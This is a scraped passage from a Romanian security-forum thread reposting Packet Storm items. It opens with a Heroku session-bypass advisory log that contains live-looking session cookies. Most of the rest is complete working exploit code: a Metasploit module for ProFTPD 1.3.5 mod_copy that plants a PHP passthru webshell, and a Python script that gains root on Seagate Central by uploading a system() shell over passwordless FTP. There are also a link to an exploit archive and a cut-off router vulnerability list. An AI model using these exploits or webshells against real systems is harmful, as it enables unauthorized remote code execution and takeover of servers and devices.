Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLaKgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmipSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXHanhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAjCO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBmnCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQn0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PYVkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d] Transfer-Encoding[chunked] Via[1.1 vegur] 17:56:37.841[603ms][total 603ms] Status: 302[Found] GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[dashboard.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af37490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; user_session_secret=BAhJIgKKBWFGcHhTbVkzVUVjeE1TdGxVSGcwWTJ3clRVMTVWWE5pYkZsUFVrRkpVMkpPYkRsR2VVdHRVeTlQWTBkaFl5OUJlSGRHVVVNMEswOW5SR1pvUVVSdFZYUk9SVWxVZGxKS1UwdHJiRTgxZEhRNGMxTnJNbUZrYVVsa01VMUdWRmxJUVVkUlMxZzJTVkJ2YUdwSVJpdGtSSFVyWTNkRVdISkJjelp4UXpVMGRVOHZMekF4UzFCT2JYRXJibVpUTUV4SVJIVmxaa2QzTmtWQlJsSk5ibEpIWkVodksyVnphV1JXVEUxdlQzcEVOREYwWjNSc2RUUndhRmwyVUdObk0xaEJMMVpQUlN0SVMyazVkbWg1UzBWV1RsTlVWVVEyVjJOVFF6VlZUemxRVlZkelZIWm5WbFpxV21FMGJIRjJZM1F2UlRWSlN6Z3hVVkJNVVc1cWQwRjJRekJEWVVrd2RuY3dhVnBtTjFaQlluWlZlSEZCU2k5WGNYZ3pkVEJKTlRGaVNHSnRNRUpSVGpWdmJXVndjSEJsVGpKa09WVTNkM0pFVUd0WFVsaDNSbHBJVjNjd01WQkllbTlWUmtodlFXOUNXbEl4WlZkdmVIQk9ZVTVGWVdKM2FGcE5ORzFuU1ZCVmVHOVFUbTlHWkVKTFQzRkRLM3BVVjAxT1dYVXlUR055YTBGVGIwOVhSbFZ2UWxjMmEwVTBjV2R5TWpSVk9IWnBkSEEwY1RkaFZEZFpLeTloUnpSUVZtNW9Xa3hVVkVkUWFIWjRjamxhTUhoSE5FUk9RbTVwZW1RemNHcHlUVmhWWkVWelVEWk5PRlpvYkRNM2NscFBjR3RMUnpsRmVuVllSbXBCVlRseWNuZE1hSGMxVDJ4VGNVNW1lR0pVVnl0a2N6bFZZVlpqYkZsSFlXNHhZMWhvVVZFMFVVaG5iRzltTmpsRmFXZDRiVUp6VEhCQlZrZzFaWFpJVW1GQ01rNU5URUZuVnpGSlkyUkdSRnBaVkdJeVkwdGlWVm81ZEU1RGJFTXZha2xIVHpGWmJUQm9SREJ3WWtsUFpVVTJlWEJvUTA1amVTOURjbmw0UWpCa2EyRXZhblJtY1U5ak4wSk9kbkpYVEhKTGR5dGpSaXMyVlhwdWEzVnFiRlpKVXpkdldteDVVSFJrVTFsaVJXMHJjMVowVlhwcVdsSTRVV3dyY25GWFZFaEZMM1ZQTlZWRVRGSlRPRk14Y2s1MFltRXdaelZUTkV0aFZqTmFZbFJ4T1N0WGNtMXBTR3RuWW1abVpYQkZXVVpQV21aM1JUZ3dNekUxTjA1ME5FOXBVRFF2Ykc1TGJYSjBVUzltTTAxRFkwcEdaVnAzUjNsSE5rNW5aRk5XSzNwT1ExVnhPR2hKVGpWd1NqaGtTWE4wTkdacVFrUTFRMk5IV0dwb1JYbFNPWEoxZG05T1pWWXlhM2xpUW1wMWJHVmxTelJ6V2xWMVZURkhMMDE1Y210SlVrVkVMMjk2T0ZKTWEwTTNVVWRyTkVNcmEwOXJibEJWTW5GcVMxRnRjMFJsU1VobWREbHRPV3hvTDNkRE9ITmtjVGwxVFRoRlpXaHJaVk5hTlV0VWFIaFBVVVZGUVRCQk4wWmxNMmR4ZVdoNlJHMDJXRzFhVG1OVVlVaDZTMDl6U3pNM2MzUk5PWEJaTUhWUFEwNVlRekZJWmpCS01HaGFVM05XYVU4NFVtZFNOVnBoUW5SWUsyNDVWbkZhUWxWdlkxZHpPVFo0TjFWc1pGbHRTV0pOWkdwU2EwYzRaejB0TFVkRWRUWm1TV0ZVU2tjM1NXeFdRekJCYWs1cGJFRTlQUT09LS1jZTZmNmQ0MTBhNjQyNzhmZGNkMmEwMjk0ZDUxOGJhNjU0NmQzM2FjBjoGRUY%3D--bd9c611ce38c8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D] Connection[keep-alive] Response Header: Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:48 GMT] Content-Type[text/html; charset=utf-8] Transfer-Encoding[chunked] status[302 Found] Strict-Transport-Security[max-age=31536000] Location[https://dashboard.heroku.com/login] Cache-Control[must-revalidate, no-cache, no-store, private] Pragma[no-cache] Expires[0] X-Frame-Options[SAMEORIGIN] x-ua-compatible[IE=Edge,chrome=1] Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c148efa8ef6adb5a004d99; path=/; secure; HttpOnly] x-request-id[5e276c4f-1382-4328-ae95-b87a73376089] x-runtime[0.006972] x-rack-cache[miss] Via[1.1 vegur] 17:56:39.215[207ms][total 207ms] Status: 304[Not Modified] GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[dataclips.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=ZXNtT29YN3FZajNrQ2U0OTBWbzZ2VHlWSUJDdnVtNmV3TEtLc25ZT0h5MW9rS2FRVzRZblpLRktRQkd3ZXZPY2hwMm41a1VjSlNEY3VGbkVXYjRQTWVLcmFsTEk4MDQvc1laWTViZ2JVZ2RzUEdMNFpGY2JZRTdwdWN3K3ZWTW56VEVpcFU4OHg1T1BQMHBGbTdkNlNFakpZMjVMVE1mNnZxM2dPL3BNKzZ1VVljeTRGUk4rbEhqcld1UEdBR3lCdDM5RkxpZk1hZWsyZkFyY0dGZmVxeUlheUt5NXhaNGNJb1ZTR2VkL1o0ZHM2OW9HTnBZb1dOZys3dVpGSFdKRDA1TysvaHg2enlWMGhLaVhnUmxwbnQ0S1JMeVl3WHFvZWwvaUI2Qy9rQU9aMmhqNllDVVJXa0FsNXZwZEdCQVpWS2d0VTlvMjZPQ1hENy9tZmE0REdZT1NvdmN3SDcrMG15dElDRlFNVkJEN24yWS9lUU03RjduTDkzQlAxcnpkNHhldEhQOVpyZjNUM3JVaU5Fek9BcmI5WGNsN0c2dFRPMTZqMjRyNnZnRndBYi9rWEcyTGMwMTZadGxhQmVWQ1hQUURyUk9tZjZtZitTSk1LMmNhQmFkOEJ3NFQreGdxUS9qeXFrUHdNQWt5cXJvRWxTQis1R1lTWThkeHI4YzRrQVVROFdhTzZEb0pMZTR3K3pLZXBoUkVMMlBncUNQZlpleTRPY1U1cHJrPS0tMHFTV09tekRBajVKeXlPS0dESE82QT09--f620fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365] Connection[keep-alive] If-None-Match["015d655373394c49a35217e89173847e"] Response Header: Content-Length[0] Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:49 GMT] status[304 Not Modified] Strict-Transport-Security[max-age=31536000] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] X-Frame-Options[SAMEORIGIN] Etag["015d655373394c49a35217e89173847e"] Cache-Control[max-age=0, private, must-revalidate] Set-Cookie[_session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly] x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359] x-runtime[0.027082] Via[1.1 vegur] 17:56:48.969[192ms][total 192ms] Status: 304[Not Modified] GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[dataclips.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D] Connection[keep-alive] If-None-Match["809917d3d9ac788b43864dd9470788d6"] Response Header: Content-Length[0] Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:59 GMT] status[304 Not Modified] Strict-Transport-Security[max-age=31536000] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] X-Frame-Options[SAMEORIGIN] Etag["809917d3d9ac788b43864dd9470788d6"] Cache-Control[max-age=0, private, must-revalidate] Set-Cookie[_session_id=L0FpUHg1M3ZuUkNUeWtxVFNxdW1UY3p0QkM0OUNsVUMyL2VBN24xZVh3d1hlN2s5VUI5Tjl1b3BzV00yaW93elp0RGNKV3cxODh0VVVmSG9CeC9NSDh0WVVvekVqUkV5bHFaSStCUnkrZ21iWGRmVy96K210K01tQXo1SkxHRldLVVZYMFdiazVkcG96N3ZUWGZhK28vRWh5WS9id0ZIWTBTdU51a1dUaWRLK1gvWlI0WFRScW5PMU1MOURsLzV0QnRqdUhZWE9SSzdZRzVSazEzeko2Y01jZjFGRGNiUVRpQ0doSitISHpjSG8xT1JGamtVeDRKRjhBMHIxZkl5Q3N6bW9BODJqekNDMnhpRjExa3N3SlJpbU4xT1Rvc0Y3Uy9wNHdmMUVMbzV5OGxwK0N2bmJQdVJRazlOamRQbkJ5RXJuVmwvOW94azJhTHRMUzY4WkszdkU0cG9zaExXQ3FWUXZqRXpmc01DOFB5V1Nhbkp0bzhlejVCZGFaeFh6RGM3TTFqYkV5TXpGNVF3SkptRy95dkVTd1IyRS93SkVTVjYrRnF1dlFLa0Q2cGdKdkVDV0NoSkdrZDBiRzVyRFRmVHE3Z0hBb1pQbEM4RTBsT3NsNURYRlZoL0dSNUtsVjRjVFc3cFZFME1DUElhblRxTUdZYVMyUUFUaWQ0YUVMTytLZytVOHJaa3RQYVJzcUZ3RGZEWEFOdTBWT2Y1ZVQ0b0kzK2k3Z3MwPS0tQnhFMFYyVGxDODRjSXpIQ3g5R1ZhQT09--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly] x-request-id[433e3190-bc29-4192-9a61-90754e41bb44] x-runtime[0.029809] Via[1.1 vegur] Reference(s): https://dataclips.heroku.com/ https://dataclips.heroku.com/clips/new https://postgres.heroku.com/databases - https://dashboard.heroku.com/account https://dashboard.heroku.com/login https://id.heroku.com/logout Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials. The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials. Security Risk: ============== The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Sursa https://dl.packetstormsecurity.net/1506-exploits/VL-1323.txt
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', 'Description' => %q{ This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible. }, 'Author' => [ 'Vadim Melihow', # Original discovery, Proof of Concept 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk bash python perl' } }, 'Targets' => [ [ 'ProFTPD 1.3.5', { } ] ], 'DisclosureDate' => 'Apr 22 2015', 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('TARGETURI', [true, 'Base path to the website', '/']), OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1, 10) if res && res.include?('350') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" } ) unless res && res.code == 200 fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end end Sursa : https://dl.packetstormsecurity.net/1506-exploits/proftpd_modcopy_exec.rb.txt
  10. Salutare. de în?eles pe forum ai s? te în?elegi , acuma depinde ?i cu cine xD
  11. #!/usr/bin/python # seagate_ftp_remote_root.py # # Seagate Central Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central by default has a passwordless root account (and no option to change it). # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot. # From there, we can execute commands with root privileges as lighttpd is also running as root. # # -Fixes- # # Seagate scheduled it's updates to go live on April 28th, 2015. # # Tested Firmware Version: 2014.0410.0026-F # import sys from ftplib import FTP port = 21 php_shell = """ <?php if(isset($_REQUEST['cmd'])) { $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd); } ?> """ php_shell_filename = "shell.php" seagate_central_webroot = "/cirrus/" def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) return if __name__ == "__main__": main() Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt
  12. 169 exploituri https://packetstormsecurity.com/files/download/132117/1505-exploits.tgz
  13. KhiZaRix

    AV SCAN

    Log In Îmi place ca po?i scana mai multe în paralel , ?i nu le d? report la nenoroci?i
  14. This is a tool to replay packet captures and simulate client/server models when doing analysis. Written in Python. Download: https://packetstormsecurity.com/files/download/132089/smartpcapreplay-1.0.tar.gz
  15. Dear PacketStorm community, we are a group of security researchers doing our IT Security Master's Thesis at Universidad Europea de Madrid. As a part of the dissertation, we have discovered multiple vulnerability issues on the following SOHO routers: 1. Observa Telecom AW4062 2. Comtrend WAP-5813n 3. Comtrend CT-5365 4. D-Link DSL-2750B 5. Belkin F5D7632-4 6. Sagem LiveBox Pro 2 SP 7. Amper Xavi 7968 and 7968+ 8. Sagem Fast 1201 9. Linksys WRT54GL 10. Observa Telecom RTA01N 11. Observa Telecom Home Station BHS-RTA 12. Observa Telecom VH4032N 13. Huawei HG553 14. Huawei HG556a 15. Astoria ARV7510 16. Amper ASL-26555 17. Comtrend AR-5387un 18. Netgear CG3100D 19. Comtrend VG-8050 20. Zyxel P 660HW-B1A 21. Comtrend 536+ 22. D-Link DIR-600 The aforementioned vulnerabilities are: - Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20. - Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and 